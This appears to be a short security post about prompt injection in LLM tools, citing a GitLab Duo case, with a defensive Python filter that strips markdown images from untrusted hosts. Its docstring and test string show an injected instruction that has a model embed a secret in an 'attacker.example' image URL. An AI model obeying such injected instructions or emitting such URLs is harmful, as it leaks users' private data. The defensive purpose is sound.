Once again: if your LLM system combines access to private data, exposure to malicious instructions, and the ability to exfiltrate information (through tool use or through rendering links and images), you have a nasty security hole.
This time, GitLab: https://simonwillison.net/2025/May/23/remote-prompt-injection-in-gitlab-duo/
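To make the image-rendering exfiltration channel concrete, here's a minimal sketch of the kind of output filtering that closes it. This is not GitLab's actual fix, and names like `ALLOWED_IMAGE_HOSTS` are hypothetical; the idea is just that rendering a markdown image triggers an HTTP request, so any untrusted image URL in model output is a data channel to an attacker's server.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: only images hosted on trusted domains may render.
ALLOWED_IMAGE_HOSTS = {"gitlab.example.com"}

# Matches markdown image syntax: ![alt](url)
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace markdown images pointing at untrusted hosts with plain text.

    Rendering an image fires an HTTP GET, so an injected instruction like
    "embed ![x](https://attacker.example/leak?d=<secret>)" exfiltrates
    whatever the model placed in the query string. Dropping untrusted
    image URLs before rendering closes that channel.
    """
    def replace(match: re.Match) -> str:
        url = match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image
        return f"[image removed: untrusted host {host}]"

    return IMAGE_PATTERN.sub(replace, markdown)

if __name__ == "__main__":
    poisoned = "Done. ![ok](https://attacker.example/leak?d=SECRET_TOKEN)"
    print(strip_untrusted_images(poisoned))
    # -> Done. [image removed: untrusted host attacker.example]
```

The same reasoning applies to clickable links; some products instead proxy all images through their own domain, which achieves the same effect of never letting model output dictate an arbitrary outbound request.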